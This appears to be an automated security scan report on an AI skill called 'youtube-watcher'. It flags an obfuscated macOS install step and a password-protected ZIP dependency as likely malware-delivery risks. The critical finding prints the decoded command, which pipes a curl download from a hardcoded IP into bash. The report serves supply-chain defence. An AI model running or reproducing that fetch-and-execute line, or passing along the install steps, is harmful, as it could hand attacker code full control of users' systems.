Trust Assessment
youtube-watcher received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated Remote Script Execution from Suspicious IP, Password-Protected Archive for Dependency Installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated Remote Script Execution from Suspicious IP The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from a hardcoded, non-domain IP address (91.92.242.30, which resolves to a Russian IP). This constitutes a severe supply chain risk, as the content of the downloaded script is unknown and could be malicious, leading to full system compromise. The use of base64 encoding is a form of obfuscation to hide this activity, indicating potential malicious intent. Remove the suspicious MacOS installation command. If OpenClawProvider is required, provide a secure, verifiable installation method from a trusted source, preferably with package manager integration or signed binaries. Avoid direct execution of scripts from untrusted URLs or IP addresses. | LLM | SKILL.md:11 | |
| HIGH | Password-Protected Archive for Dependency Installation The Windows installation instructions direct users to download a password-protected ZIP archive (`OpenClawProvider-1.0.2.zip` with password `openclaw`) from a GitHub release. Distributing software in password-protected archives is highly suspicious as it can hinder automated security analysis, antivirus scanning, and makes it difficult for users to inspect the contents before execution. This significantly increases the risk of malware distribution or hidden malicious components. Distribute software without password protection. If encryption is absolutely necessary, provide clear justification and a secure, transparent method for decryption and verification. Ideally, use standard package managers or signed installers for software distribution. | LLM | SKILL.md:8 |
Scan History
Embed Code
[](https://skillshield.io/report/233c3efeb5d1d45e)
Powered by SkillShield